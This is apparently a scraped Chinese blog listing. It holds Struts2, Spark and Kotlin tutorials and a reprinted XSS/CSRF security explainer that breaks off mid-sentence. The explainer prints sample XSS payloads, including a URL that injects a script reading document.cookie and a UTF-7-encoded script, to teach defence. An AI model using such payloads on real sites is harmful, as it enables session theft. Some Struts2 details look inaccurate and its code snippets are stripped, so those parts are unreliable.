总结起来,虽然Struts2可以容忍Action方法返回null或空字符串,但这并不意味着我们应该依赖这种默认行为来驱动应用流程。理解并熟练运用Struts2的返回结果机制,就像是给咱们打造的应用程序装上了一颗强劲稳定的“心脏”,让它不仅运行得更稳、更强壮,而且在日后维护升级时也能轻松应对,让我们的开发工作如虎添翼。
2023-10-30 09:31:04
94
清风徐来
Struts2
使用Struts2模型驱动(ModelDriven)模式时的数据绑定问题深度探讨 在我们深入开发Web应用程序时,Apache Struts2作为一个强大的MVC框架,以其卓越的灵活性和易用性深受开发者喜爱。其中,模型驱动(ModelDriven)模式作为其数据绑定机制的一部分,能简化Action类与表单数据之间的交互过程,但同时也可能带来一些潜在的问题。本文将通过实例代码详细剖析这些可能遇到的数据绑定问题,并尝试提出相应的解决方案。 1. 模型驱动模式简介 模型驱动模式是Struts2提供的一种数据绑定方式,允许Action类继承自ModelDriven接口,并实现其getModel()方法,这样在请求处理过程中,Struts2会自动将请求参数映射到模型对象的属性上,大大简化了表单数据的处理流程。 java public class UserAction implements ModelDriven { private User user = new User(); @Override public User getModel() { return user; } // 其他Action方法... } 2. 数据绑定常见问题 2. 1. 属性覆盖问题 当模型对象的属性与Action类自身的属性同名时,可能会发生数据绑定冲突,导致模型对象的属性被Action类的属性值覆盖。 java public class UserAction extends ActionSupport implements ModelDriven { private String username; // 自身属性与模型对象属性同名 private User user = new User(); // 如果username存在于请求参数中,那么这里模型对象user的username会被Action自身username属性的值覆盖。 // ...其他代码不变 } 解决这个问题的方法是避免Action类中的属性与模型对象属性重名,或者使用@SkipValidation注解来跳过对Action类特定属性的验证和绑定。 2. 2. 数据校验问题 模型驱动模式下,Struts2默认只对模型对象进行校验,如果Action类有额外的业务逻辑需要验证,则需手动配置或利用拦截器进行验证。 java public class UserAction extends ActionSupport implements ModelDriven { // 用户密码确认字段,不在User模型中 private String confirmPassword; // 此处需要自定义校验逻辑以检查密码是否一致,不能依赖Struts2默认的数据校验机制 // ...添加自定义校验逻辑代码 } 2. 3. 数据转换问题 模型驱动的数据绑定默认使用Struts2的类型转换器进行属性值的转换。如果模型里的属性有点特殊,比如日期啊、枚举什么的,你要是没给它们配上合适的转换器,小心到时候可能会蹦出个转换异常来。 java public class User { private Date birthDate; // 需要日期类型的转换器 // ...其他代码不变 } // 解决方案是在struts.xml中配置对应的类型转换器 yyyy-MM-dd 3. 总结与思考 模型驱动模式无疑极大地方便了我们在Struts2中处理表单数据,但同时我们也应关注并妥善处理上述提及的数据绑定问题。在实际做项目的时候,咱们得把这个模式玩得溜溜的,而且还得把它吃得透透的,这样才能够让它发挥出最大的作用,真正地派上大用场。此外,随着技术的发展和项目的复杂度提升,我们也应该不断探索更高效、安全的数据绑定策略,确保程序稳定运行的同时,提高开发效率和用户体验。
2023-10-28 09:39:32
110
烟雨江南
Struts2
...引言 在我们日常使用Struts2进行Java Web开发的过程中,Interceptor拦截器扮演着举足轻重的角色。它位于业务逻辑和视图渲染之间,提供了诸如权限验证、输入校验、事务管理等强大的中间件功能。不过在实际用起来的时候,Interceptor这家伙在做事前的“把关”阶段,或者事儿后的“扫尾”阶段闹脾气、抛出异常的情况,其实并不算少见。那么,如何理解和妥善处理这类异常呢?本文将带您一起探索这个主题。 2. Struts2 Interceptor的工作原理及流程 首先,让我们回顾一下Struts2 Interceptor的基本工作原理。每个Interceptor按照配置文件中定义的顺序执行,分为“预处理”和“后处理”两个阶段: - 预处理阶段(intercept()方法前半部分):主要用于对Action调用之前的请求参数进行预处理,例如数据校验、权限检查等。 java public String intercept(ActionInvocation invocation) throws Exception { // 预处理阶段代码 try { // 进行数据校验或权限检查... } catch (Exception e) { // 处理并可能抛出异常 } // 调用下一个Interceptor或执行Action String result = invocation.invoke(); // 后处理阶段代码 // ... return result; } - 后处理阶段(intercept()方法后半部分):主要是在Action方法执行完毕,即将返回结果给视图层之前,进行一些资源清理、日志记录等工作。 3. Interceptor抛出异常的场景与处理 假设我们在预处理阶段进行用户权限验证时发现当前用户无权访问某个资源,此时可能会选择抛出一个自定义的AuthorizationException。 java public String intercept(ActionInvocation invocation) throws Exception { // 模拟权限验证失败 if (!checkPermission()) { throw new AuthorizationException("User has no permission to access this resource."); } // ... } 当Interceptor抛出异常时,Struts2框架默认会停止后续Interceptor的执行,并通过其内部的异常处理器链来处理该异常。若未配置特定的异常处理器,则最终会显示一个错误页面。 4. 自定义异常处理策略 对于这种情况,开发者可以根据需求定制异常处理策略。比方说,你可以亲手打造一个定制版的ExceptionInterceptor小助手,让它专门逮住并妥善处理这类异常情况。或者呢,你也可以在struts.xml这个配置大本营里,安排一个全局异常的乾坤大挪移,把特定的异常类型巧妙地对应到相应的Action或结果上去。 xml /error/unauthorized.jsp 5. 总结与探讨 在面对Interceptor拦截器抛出异常的问题时,理解其运行机制和异常处理流程至关重要。作为开发者,咱们得机智地运用Struts2给出的异常处理工具箱,巧妙地设计和调配那些Interceptor小家伙们,这样才能稳稳保证系统的健壮性,让用户体验溜溜的。同时呢,咱也得把代码的可读性和可维护性照顾好,让处理异常的过程既够严谨又充满弹性,可以方便地扩展。这说到底,就是在软件工程实践中的一种艺术活儿。 通过以上的探讨和实例分析,我们不仅揭示了Struts2 Interceptor在异常处理中的作用,也展现了其在实际开发中的强大灵活性和实用性。希望这篇文章能帮助你更好地驾驭Struts2,更从容地应对各种复杂情况下的异常处理问题。
2023-03-08 09:54:25
159
风中飘零
Struts2
一、引言 Struts2,作为Java Web开发中的重要框架之一,以其强大的灵活性和模块化设计深受开发者喜爱。然而,就像任何复杂的系统一样,它并非总是无缝运行。在玩转Struts2的时候,偶尔会碰到一些小惊喜,比如那些拦截器小伙伴,你明明期待它们按部就班地来,结果却调皮捣蛋不按套路出牌。今天,我们就来深入探讨这个问题,看看背后的原因,以及如何解决。 二、Struts2拦截器的基本概念 Struts2的拦截器(Interceptors)是一种在Action执行前后进行处理的机制,它们可以对Action的行为进行扩展和定制。拦截器有三个不同的小伙伴:预热的"预请求"小能手,它总是在事情开始前先出马;然后是"后置通知"大侠,等所有操作都搞定后才发表意见;最后是超级全能的"环绕"拦截器,它就像个紧密跟随的保护者,全程参与整个操作过程。你知道吗,拦截器们就像乐队里的乐手,每个都有自己的表演时刻。比如,"PreActionInterceptor"就像个勤奋的彩排者,在Action准备上台前悄悄地做着准备工作。而"ResultExecutorInterceptor"呢,就像个敬业的执行官,总是在Action表演结束后,第一时间检查评分表,确保一切都完美无缺。 三、拦截器执行顺序的设定 默认情况下,Struts2按照拦截器链(Interceptor Chain)的配置顺序执行拦截器。拦截器链的配置通常在struts.xml文件中定义,如下所示: xml 这里,“defaultStack”是默认的拦截器链,包含了多个拦截器,如日志拦截器(logger)。如果你没给拦截器设定特定的先后顺序,那就得按它默认的清单来,就像排队一样,先来的先办事。 四、拦截器未按预期执行的可能原因 1. 配置错误 可能是你对拦截器的引用顺序有误,或者某个拦截器被错误地插入到了其他拦截器之后。 xml // "after"属性应为"before" 2. 插件冲突 如果你使用了第三方插件,可能会与Struts2内置的拦截器产生冲突,导致执行顺序混乱。 3. 自定义拦截器 如果你编写了自己的拦截器,并且没有正确地加入到拦截器链中,可能会导致预期之外的执行顺序。 五、解决策略 1. 检查配置 仔细审查struts.xml文件,确保所有拦截器的引用和顺序都是正确的。如果发现错误,修正后重新部署应用。 2. 排查插件 移除或调整冲突的插件,或者尝试更新插件版本,看是否解决了问题。 3. 调试自定义拦截器 如果你使用了自定义拦截器,确保它们正确地加入了默认拦截器链,或者在需要的地方添加适当的before或after属性。 六、结论 虽然Struts2的拦截器顺序问题可能会让人头疼,但只要我们理解了其工作原理并掌握了正确的配置方法,就能有效地解决这类问题。你知道吗,生活中的小麻烦其实都是给我们升级打怪的机会!每解决一个棘手的事儿,我们就悄悄变得更棒了,成长就这么不知不觉地发生着。祝你在Struts2的世界里游刃有余!
2024-04-28 11:00:36
126
时光倒流
Struts2
1. 引言 在我们与Struts2这位久经沙场的老将共舞时,有时会遇到一个让人挠头的错误提示——"Requested resource /resourcePath is not available"。这就像是你满心期待地要去打开一扇藏着宝藏的门,结果却发现钥匙孔里空荡荡的啥都没有,门也被紧紧锁住,压根进不去。这篇东西,我们打算用轻松随意、像朋友聊天一样的方式,带大家一步步揭开这个问题的神秘面纱。咱们会通过实实在在的代码例子,摸清楚背后那些“为啥这样”的原因,同时还会给出解决这个问题的锦囊妙计。 2. 问题概述 在使用Struts2框架进行Web开发的过程中,当你试图访问某个Action对应的URL时,若服务器返回了上述错误信息,那么很可能是由于Struts2未能正确地找到并解析到对应的Action资源。用大白话来说,这句话对程序员朋友解释就是:“嘿兄弟,我在你给我的这片代码江湖里,愣是没找到你要我搞定的那个请求路径咧。” 3. 错误原因深度解读 (1)配置问题:这是最常见的原因之一。在Struts2中,我们可以采用XML文件或者注解的方式来给程序做设置。设想一下这个场景哈,如果我们马虎大意,在struts.xml这个配置文件里没有把Action映射正确地写出来,或者是在使用注解配置时搞错了,那么Struts2里面那个核心的“快递员”——DispatcherServlet就没法找到对应能处理请求的Action了。这时候,它可就懵圈了,只能抛出一个异常来表达它的无奈和困惑。 xml /invalid.jsp (2)资源路径问题:当请求被成功路由到Action后,如果你在Action中返回了一个无效的结果路径,也会导致此问题。例如,你可能在结果类型中指定了一个不存在的视图页面。 java // 示例:错误的Action类方法 public String execute() { // ...业务逻辑... return "nonExistentView"; // 这个结果名称在struts.xml中没有对应的有效结果路径 } 4. 解决方案及实战演练 (1)检查Action配置:首先,我们需要核实struts.xml中Action的配置是否正确,包括Action的name属性是否与请求URL匹配,class属性指向的类是否存在且路径正确。 (2)验证结果路径:其次,确认Action执行方法返回的结果字符串所对应的结果路径是否存在。例如: xml /WEB-INF/pages/success.jsp /WEB-INF/pages/exists.jsp (3)排查其他可能性:除此之外,还需注意过滤器链的配置是否合理,避免请求在到达Struts2核心过滤器前就被拦截或处理;同时,也要关注项目部署环境,确认资源文件是否已正确部署至服务器。 5. 结语 面对“Requested resource /resourcePath is not available”的困扰,就像我们在探险过程中遭遇了一道看似无解的谜题。但是,只要我们像侦探破案那样,耐心又细致地把问题揪出来,一步步审查各个环节,早晚能揭开迷雾,让Struts2重新焕发活力,流畅地为我们工作。毕竟,编程的乐趣不仅在于解决问题,更在于那份抽丝剥茧、寻根问底的过程。让我们共同携手,在Struts2的世界里,尽情挥洒智慧与热情吧!
2024-01-24 17:26:04
169
清风徐来
Spark
...的发布着重优化了依赖解析和冲突解决机制,大大提升了大型项目依赖管理的效率和准确性。 同时,随着云原生技术的发展,容器化部署成为趋势,Docker等容器技术在构建和运行Spark应用时,通过将所有依赖库打包进镜像,有效避免了环境不一致导致的依赖缺失问题。此外,持续集成/持续部署(CI/CD)流程中对依赖项的严格控制也成为了行业最佳实践,如使用GitHub Actions或Jenkins等工具,在代码合并前自动检查并更新依赖版本,确保上线应用的稳定性和安全性。 另外,近年来业界对于开源组件安全性的重视程度也在提高,诸如OWASP Dependency-Check这样的开源工具被广泛应用于检测项目依赖中的已知漏洞。这意味着在关注依赖完整性的同时,开发者也需要密切关注所引入第三方库的安全状态,及时修复潜在风险。 总的来说,无论是从工程实践角度还是安全维度出发,深入理解和掌握依赖管理不仅对于Spark应用至关重要,也是整个软件开发领域的一项基础技能,值得每一位开发者持续学习和探索。
2023-04-22 20:19:25
96
灵动之光
转载文章
...使用装饰模式,对源类实例的操作和包装,其实际相当于我们在 Java中定义的工具类方法,并且该工具类方法是使用调用者为第一个参数的,然后在工具方法中操作该调用者 如: fun String?.toInt(): 反编译为对应的Java代码: public 扩展属性 类的扩展属性原理其实与扩展方法是一样的,只是定义的形式不同,扩展属性必须定义get和set方法 为MutableList扩展一个firstElement属性: var 反编译后的java代码如下: public static final Object getFirstElement(@NotNull List $this$firstElement) { 内部类 kotlin的内部类与java的内部类有点不同java的内部类可以直接访问外部类的成员,kotlin的内部类不能直接访问外部类的成员,必须用inner标记之后才能访问外部类的成员 没有使用inner标记的内部类 class A{ 反编译后的java代码 public 用inner标记的内部类 class A{ 反编译后的java代码 public 从上面可以看出,没有使用inner标记的内部类最后生成的是静态内部类,而使用inner标记的生成的是非静态内部类 匿名内部类 匿名内部类主要是针对那些获取抽象类或者接口对象而来的。最常见的匿名内部类View点击事件: //java,匿名内部类的写法 上面这个是java匿名内部类的写法,kotlin没有new关键字,那么kotlin的匿名内部类该怎么写呢? object : View.OnClickListener{ 方法的参数是一个匿名内部类,先写object:,然后写你的参数类型View.OnClickListener{} kotlin还有一个写法lambda 表达式,非常之方便: print( 数据类 在Java中没有专门的数据类,常常是通过JavaBean来作为数据类,但在Kotlin中提供了专门的数据类。 Java public 从上面的例子中可以看到,如果要使用数据类,需要手动写相应的setter/getter方法(尽管IDE也可以批量生成),但是从代码阅读的角度来说,在属性较多的情况下,诸多的seeter/getter方法还是不利于代码的阅读和维护。 Kotlin 在Kotlin中,可以通过关键字data来生成数据类: data 即在class关键字之前添加data关键字即可。编译器会根据主构造函数中的参数生成相应的数据类。自动生成setter/getter、toString、hashCode等方法 要声明一个数据类,需要满足: 主构造函数中至少有一个参数 主构造函数中所有参数需要标记为val或var 数据类不能是抽象、开发、密封和内部的 枚举类 枚举类是一种特殊的类,kotlin可以通过enum class关键字定义枚举类。 枚举类可以实现0~N个接口; 枚举类默认继承于kotlin.Enum类(其他类最终父类都是Any),因此kotlin枚举类不能继承类; 非抽象枚举类不能用open修饰符修饰,因此非抽象枚举类不能派生子类; 抽象枚举类不能使用abstract关键字修饰enum class,抽象方法和抽象属性需要使用; 枚举类构造器只能使用private修饰符修饰,若不指定,则默认为private; 枚举类所有实例在第一行显式列出,每个实例之间用逗号隔开,整个声明以分号结尾; 枚举类是特殊的类,也可以定义属性、方法、构造器; 枚举类应该设置成不可变类,即属性值不允许改变,这样更安全; 枚举属性设置成只读属性后,最好在构造器中为枚举类指定初始值,如果在声明时为枚举指定初始值,会导致所有枚举值(或者说枚举对象)的该属性都一样。 定义枚举类 / 定义一个枚举类 / 枚举类实现接口 枚举值分别实现接口的抽象成员 enum 枚举类统一实现接口的抽象成员 enum 分别实现抽象枚举类抽象成员 enum 委托 委托模式 是软件设计模式中的一项基本技巧。在委托模式中,有两个对象参与处理同一个请求,接受请求的对象将请求委托给另一个对象来处理。委托模式是一项基本技巧,许多其他的模式,如状态模式、策略模式、访问者模式本质上是在更特殊的场合采用了委托模式。委托模式使得我们可以用聚合来替代继承。 Java中委托: interface Printer { Kotlin: interface Printer { by表示 p 将会在 PrintImpl 中内部存储, 并且编译器将自动生成转发给 p 的所有 Printer 的方法。 委托属性 有一些常见的属性类型,虽然我们可以在每次需要的时候手动实现它们, 但是如果能够为大家把他们只实现一次并放入一个库会更好。例如包括: 延迟属性(lazy properties): 其值只在首次访问时计算; 可观察属性(observable properties): 监听器会收到有关此属性变更的通知; 把多个属性储存在一个映射(map)中,而不是每个存在单独的字段中。 为了涵盖这些(以及其他)情况,Kotlin 支持 委托属性 。 委托属性的语法是: var : 在 by 后面的表达式是该 委托, 因为属性对应的 get()(和 set())会被委托给它的 getValue() 和 setValue() 方法。 标准委托: Kotlin 标准库为几种有用的委托提供了工厂方法。 延迟属性 Lazy lazy() 接受一个 lambda 并返回一个 Lazy 实例的函数,返回的实例可以作为实现延迟属性的委托:第一次调用 get() 会执行已传递给 lazy() 的 lambda 表达式并记录结果, 后续调用 get() 只是返回记录的结果。例如: val lazyValue: String 可观察属性 Observable Delegates.observable() 接受两个参数:初始值和修改时处理程序(handler)。每当我们给属性赋值时会调用该处理程序(在赋值后执行)。它有三个参数:被赋值的属性、旧值和新值: class User { 如果想拦截赋的新值,并根据你是不是想要这个值来决定是否给属性赋新值,可以使用 vetoable() 取代 observable(),接收的参数和 observable 一样,不过处理程序 返回值是 Boolean 来决定是否采用新值,即在属性被赋新值生效之前 会调用传递给 vetoable 的处理程序。例如: class User { 把属性存在map 中 一个常见的用例是在一个映射(map)里存储属性的值。这经常出现在像解析 JSON 或者做其他“动态”事情的应用中。在这种情况下,你可以使用映射实例自身作为委托来实现委托属性。 例如: class User(map: Map 在上例中,委托属性会从构造函数传入的map中取值(通过字符串键——属性的名称),如果遇到声明的属性名在map 中找不到对应的key 名,或者key 对应的value 值的类型与声明的属性的类型不一致,会抛出异常。 内联函数 当一个函数被声明为inline时,它的函数体是内联的,也就是说,函数体会被直接替换到函数被调用地方 inline函数(内联函数)从概念上讲是编译器使用函数实现的真实代码来替换每一次的函数调用,带来的最直接的好处就是节省了函数调用的开销,而缺点就是增加了所生成字节码的尺寸。基于此,在代码量不是很大的情况下,我们是否有必要将所有的函数定义为内联?让我们分两种情况进行说明: 将普通函数定义为内联:众所周知,JVM内部已经实现了内联优化,它会在任何可以通过内联来提升性能的地方将函数调用内联化,并且相对于手动将普通函数定义为内联,通过JVM内联优化所生成的字节码,每个函数的实现只会出现一次,这样在保证减少运行时开销的同时,也没有增加字节码的尺寸;所以我们可以得出结论,对于普通函数,我们没有必要将其声明为内联函数,而是交给JVM自行优化。 将带有lambda参数的函数定义为内联:是的,这种情况下确实可以提高性能;但在使用的过程中,我们会发现它是有诸多限制的,让我们从下面的例子开始展开说明: inline 假如我们这样调用doSomething: fun main(args: Array<String>) { 上面的调用会被编译成: fun main(args: Array<String>) { 从上面编译的结果可以看出,无论doSomething函数还是action参数都被内联了,很棒,那让我们换一种调用方式: fun main(args: Array<String>) { 上面的调用会被编译成: fun main(args: Array<String>) { doSomething函数被内联,而action参数没有被内联,这是因为以函数型变量的形式传递给doSomething的lambda在函数的调用点是不可用的,只有等到doSomething被内联后,该lambda才可以正常使用。 通过上面的例子,我们对lambda表达式何时被内联做一下简单的总结: 当lambda表达式以参数的形式直接传递给内联函数,那么lambda表达式的代码会被直接替换到最终生成的代码中。 当lambda表达式在某个地方被保存起来,然后以变量形式传递给内联函数,那么此时的lambda表达式的代码将不会被内联。 上面对lambda的内联时机进行了讨论,消化片刻后让我们再看最后一个例子: inline 上面的例子是否有问题?是的,编译器会抛出“Illegal usage of inline-parameter”的错误,这是因为Kotlin规定内联函数中的lambda参数只能被直接调用或者传递给另外一个内联函数,除此之外不能作为他用;那我们如果确实想要将某一个lambda传递给一个非内联函数怎么办?我们只需将上述代码这样改造即可: inline 很简单,在不需要内联的lambda参数前加上noinline修饰符就可以了。 以上便是我对内联函数的全部理解,通过掌握该特性的运行机制,相信大家可以做到在正确的时机使用该特性,而非滥用或因恐惧弃而不用。 Kotlin下单例模式 饿汉式实现 //Java实现 懒汉式 //Java实现 上述代码中,我们可以发现在Kotlin实现中,我们让其主构造函数私有化并自定义了其属性访问器,其余内容大同小异。 如果有小伙伴不清楚Kotlin构造函数的使用方式。请点击 - - - 构造函数 不清楚Kotlin的属性与访问器,请点击 - - -属性和字段 线程安全的懒汉式 //Java实现 大家都知道在使用懒汉式会出现线程安全的问题,需要使用使用同步锁,在Kotlin中,如果你需要将方法声明为同步,需要添加@Synchronized注解。 双重校验锁式 //Java实现 哇!小伙伴们惊喜不,感不感动啊。我们居然几行代码就实现了多行的Java代码。其中我们运用到了Kotlin的延迟属性 Lazy。 Lazy内部实现 public 观察上述代码,因为我们传入的mode = LazyThreadSafetyMode.SYNCHRONIZED, 那么会直接走 SynchronizedLazyImpl,我们继续观察SynchronizedLazyImpl。 Lazy接口 SynchronizedLazyImpl实现了Lazy接口,Lazy具体接口如下: public 继续查看SynchronizedLazyImpl,具体实现如下: SynchronizedLazyImpl内部实现 private 通过上述代码,我们发现 SynchronizedLazyImpl 覆盖了Lazy接口的value属性,并且重新了其属性访问器。其具体逻辑与Java的双重检验是类似的。 到里这里其实大家还是肯定有疑问,我这里只是实例化了SynchronizedLazyImpl对象,并没有进行值的获取,它是怎么拿到高阶函数的返回值呢?。这里又涉及到了委托属性。 委托属性语法是:val/var : by 。在 by 后面的表达式是该 委托, 因为属性对应的 get()(和 set())会被委托给它的 getValue() 和 setValue() 方法。属性的委托不必实现任何的接口,但是需要提供一个 getValue() 函数(和 setValue()——对于 var 属性)。 而Lazy.kt文件中,声明了Lazy接口的getValue扩展函数。故在最终赋值的时候会调用该方法。 internal.InlineOnly 静态内部类式 //Java实现 静态内部类的实现方式,也没有什么好说的。Kotlin与Java实现基本雷同。 补充 在该篇文章结束后,有很多小伙伴咨询,如何在Kotlin版的Double Check,给单例添加一个属性,这里我给大家提供了一个实现的方式。(不好意思,最近才抽出时间来解决这个问题) class SingletonDemo private constructor( 其中关于?:操作符,如果 ?: 左侧表达式非空,就返回其左侧表达式,否则返回右侧表达式。请注意,当且仅当左侧为空时,才会对右侧表达式求值。 Kotlin 智能类型转换 对于子父类之间的类型转换 先看这样一段 Java 代码 public 尽管在 main 函数中,对 person 这个对象进行了类型判断,但是在使用的时候还是需要强制转换成 Student 类型,这样是不是很不智能? 同样的情况在 Kotlin 中就变得简单多了 fun main(args: Array<String>) { 在 Kotlin 中,只要对类型进行了判断,就可以直接通过父类的对象去调用子类的函数了 安全的类型转换 还是上面的那个例子,如果我们没有进行类型判断,并且直接进行强转,会怎么样呢? public static void main(String[] args) { 结果就只能是 Exception in thread "main" java.lang.ClassCastException 那么在 Kotlin 中是不是会有更好的解决方法呢? val person: Person = Person() 在转换操作符后面添加一个 ?,就不会把程序 crash 掉了,当转化失败的时候,就会返回一个 null 在空类型中的智能转换 需要提前了解 Kotlin 类型安全的相关知识(Kotlin 中的类型安全(对空指针的优化处理)) String? = aString 在定义的时候定义成了有可能为 null,按照之前的写法,我们需要这样写 String? = 但是已经进行了是否为 String 类型的判断,所以就一定 不是 空类型了,也就可以直接输出它的长度了 T.()->Unit 、 ()->Unit 在做kotlin开发中,经常看到一些系统函数里,用函数作为参数 public .()-Unit与()->Unit的区别是我们调用时,在代码块里面写this,的时候,两个this代表的含义不一样,T.()->Unit里的this代表的是自身实例,而()->Unit里,this代表的是外部类的实例。 推荐阅读 对 Kotlin 与 Java 编程语言的思考 使用 Kotlin 做开发一个月后的感想 扫一扫 关注我的公众号如果你想要跟大家分享你的文章,欢迎投稿~ 本篇文章为转载内容。原文链接:https://blog.csdn.net/weixin_39611037/article/details/109984124。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-06-23 23:56:14
470
转载
转载文章
... XSS 漏洞,也叫反射型 XSS 漏洞,一般是通过给别人发送带有恶意脚本代码参数的 URL,当 URL 地址被打开时,特有的恶意代码参数被 HTML 解析、执行。 非持久型 XSS 举一个例子,比如你的 Web 页面中包含有以下代码: Select your language:<select><script>document.write(''+ '<option value=1>'+ location.href.substring(location.href.indexOf('default=') + 8)+ '</option>');document.write('<option value=2>English</option>');</script></select> 攻击者可以直接通过 URL 类似:https://xx.com/xx?default=<script>alert(document.cookie)</script>) 注入可执行的脚本代码。 非持久型 XSS 漏洞攻击有以下几点特征: 即时性,不经过服务器存储,直接通过 HTTP 的 GET 和 POST 请求就能完成一次攻击,拿到用户隐私数据。 攻击者需要诱骗点击 反馈率低,所以较难发现和响应修复 盗取用户敏感保密信息 为了防止出现非持久型 XSS 漏洞,需要确保这么几件事情: Web 页面渲染的所有内容或者渲染的数据都必须来自于服务端。 尽量不要从 URL,document.referrer,document.forms 等这种 DOM API 中获取数据直接渲染。 尽量不要使用 eval, new Function(),document.write(),document.writeln(),window.setInterval(),window.setTimeout(),innerHTML,document.creteElement() 等可执行字符串的方法。 如果做不到以上几点,也必须对涉及 DOM 渲染的方法传入的字符串参数做 escape 转义。 前端渲染的时候对任何的字段都需要做 escape 转义编码。 escape 转义的目的是将一些构成 HTML 标签的元素转义,比如 <,>,空格 等,转义成 <,>, 等显示转义字符。有很多开源的工具可以协助我们做 escape 转义。 持久型 XSS 持久型 XSS 漏洞,也被称为存储型 XSS 漏洞,一般存在于 Form 表单提交等交互功能,如发帖留言,提交文本信息等,黑客利用的 XSS 漏洞,将内容经正常功能提交进入数据库持久保存,当前端页面获得后端从数据库中读出的注入代码时,恰好将其渲染执行。 主要注入页面方式和非持久型 XSS 漏洞类似,只不过持久型的不是来源于 URL,refferer,forms 等,而是来源于后端从数据库中读出来的数据。持久型 XSS 攻击不需要诱骗点击,黑客只需要在提交表单的地方完成注入即可,但是这种 XSS 攻击的成本相对还是很高。攻击成功需要同时满足以下几个条件: POST 请求提交表单后端没做转义直接入库。 后端从数据库中取出数据没做转义直接输出给前端。 前端拿到后端数据没做转义直接渲染成 DOM。 持久型 XSS 有以下几个特点: 持久性,植入在数据库中 危害面广,甚至可以让用户机器变成 DDoS 攻击的肉鸡。 盗取用户敏感私密信息 为了防止持久型 XSS 漏洞,需要前后端共同努力: 后端在入库前应该选择不相信任何前端数据,将所有的字段统一进行转义处理。 后端在输出给前端数据统一进行转义处理。 前端在渲染页面 DOM 的时候应该选择不相信任何后端数据,任何字段都需要做转义处理。 基于字符集的 XSS 其实现在很多的浏览器以及各种开源的库都专门针对了 XSS 进行转义处理,尽量默认抵御绝大多数 XSS 攻击,但是还是有很多方式可以绕过转义规则,让人防不胜防。比如「基于字符集的 XSS 攻击」就是绕过这些转义处理的一种攻击方式,比如有些 Web 页面字符集不固定,用户输入非期望字符集的字符,有时会绕过转义过滤规则。 以基于 utf-7 的 XSS 为例 utf-7 是可以将所有的 unicode 通过 7bit 来表示的一种字符集 (但现在已经从 Unicode 规格中移除)。 这个字符集为了通过 7bit 来表示所有的文字, 除去数字和一部分的符号,其它的部分将都以 base64 编码为基础的方式呈现。 <script>alert("xss")</script>可以被解释为:+ADw-script+AD4-alert(+ACI-xss+ACI-)+ADw-/script+AD4- 可以形成「基于字符集的 XSS 攻击」的原因是由于浏览器在 meta 没有指定 charset 的时候有自动识别编码的机制,所以这类攻击通常就是发生在没有指定或者没来得及指定 meta 标签的 charset 的情况下。 所以我们有什么办法避免这种 XSS 呢? 记住指定 XML 中不仅要指定字符集为 utf-8,而且标签要闭合 牛文推荐:http://drops.wooyun.org/papers/1327 (这个讲的很详细) 基于 Flash 的跨站 XSS 基于 Flash 的跨站 XSS 也是属于反射型 XSS 的一种,虽然现在开发 ActionScript 的产品线几乎没有了,但还是提一句吧,AS 脚本可以接受用户输入并操作 cookie,攻击者可以配合其他 XSS(持久型或者非持久型)方法将恶意 swf 文件嵌入页面中。主要是因为 AS 有时候需要和 JS 传参交互,攻击者会通过恶意的 XSS 注入篡改参数,窃取并操作cookie。 避免方法: 严格管理 cookie 的读写权限 对 Flash 能接受用户输入的参数进行过滤 escape 转义处理 未经验证的跳转 XSS 有一些场景是后端需要对一个传进来的待跳转的 URL 参数进行一个 302 跳转,可能其中会带有一些用户的敏感(cookie)信息。如果服务器端做302 跳转,跳转的地址来自用户的输入,攻击者可以输入一个恶意的跳转地址来执行脚本。 这时候需要通过以下方式来防止这类漏洞: 对待跳转的 URL 参数做白名单或者某种规则过滤 后端注意对敏感信息的保护, 比如 cookie 使用来源验证。 CSRF CSRF(Cross-Site Request Forgery),中文名称:跨站请求伪造攻击 那么 CSRF 到底能够干嘛呢?你可以这样简单的理解:攻击者可以盗用你的登陆信息,以你的身份模拟发送各种请求。攻击者只要借助少许的社会工程学的诡计,例如通过 QQ 等聊天软件发送的链接(有些还伪装成短域名,用户无法分辨),攻击者就能迫使 Web 应用的用户去执行攻击者预设的操作。例如,当用户登录网络银行去查看其存款余额,在他没有退出时,就点击了一个 QQ 好友发来的链接,那么该用户银行帐户中的资金就有可能被转移到攻击者指定的帐户中。 所以遇到 CSRF 攻击时,将对终端用户的数据和操作指令构成严重的威胁。当受攻击的终端用户具有管理员帐户的时候,CSRF 攻击将危及整个 Web 应用程序。 CSRF 原理 下图大概描述了 CSRF 攻击的原理,可以理解为有一个小偷在你配钥匙的地方得到了你家的钥匙,然后拿着要是去你家想偷什么偷什么。 csrf原理 完成 CSRF 攻击必须要有三个条件: 用户已经登录了站点 A,并在本地记录了 cookie 在用户没有登出站点 A 的情况下(也就是 cookie 生效的情况下),访问了恶意攻击者提供的引诱危险站点 B (B 站点要求访问站点A)。 站点 A 没有做任何 CSRF 防御 你也许会问:「如果我不满足以上三个条件中的任意一个,就不会受到 CSRF 的攻击」。其实可以这么说的,但你不能保证以下情况不会发生: 你不能保证你登录了一个网站后,不再打开一个 tab 页面并访问另外的网站,特别现在浏览器都是支持多 tab 的。 你不能保证你关闭浏览器了后,你本地的 cookie 立刻过期,你上次的会话已经结束。 上图中所谓的攻击网站 B,可能是一个存在其他漏洞的可信任的经常被人访问的网站。 预防 CSRF CSRF 的防御可以从服务端和客户端两方面着手,防御效果是从服务端着手效果比较好,现在一般的 CSRF 防御也都在服务端进行。服务端的预防 CSRF 攻击的方式方法有多种,但思路上都是差不多的,主要从以下两个方面入手: 正确使用 GET,POST 请求和 cookie 在非 GET 请求中增加 token 一般而言,普通的 Web 应用都是以 GET、POST 请求为主,还有一种请求是 cookie 方式。我们一般都是按照如下规则设计应用的请求: GET 请求常用在查看,列举,展示等不需要改变资源属性的时候(数据库 query 查询的时候) POST 请求常用在 From 表单提交,改变一个资源的属性或者做其他一些事情的时候(数据库有 insert、update、delete 的时候) 当正确的使用了 GET 和 POST 请求之后,剩下的就是在非 GET 方式的请求中增加随机数,这个大概有三种方式来进行: 为每个用户生成一个唯一的 cookie token,所有表单都包含同一个伪随机值,这种方案最简单,因为攻击者不能获得第三方的 cookie(理论上),所以表单中的数据也就构造失败,但是由于用户的 cookie 很容易由于网站的 XSS 漏洞而被盗取,所以这个方案必须要在没有 XSS 的情况下才安全。 每个 POST 请求使用验证码,这个方案算是比较完美的,但是需要用户多次输入验证码,用户体验比较差,所以不适合在业务中大量运用。 渲染表单的时候,为每一个表单包含一个 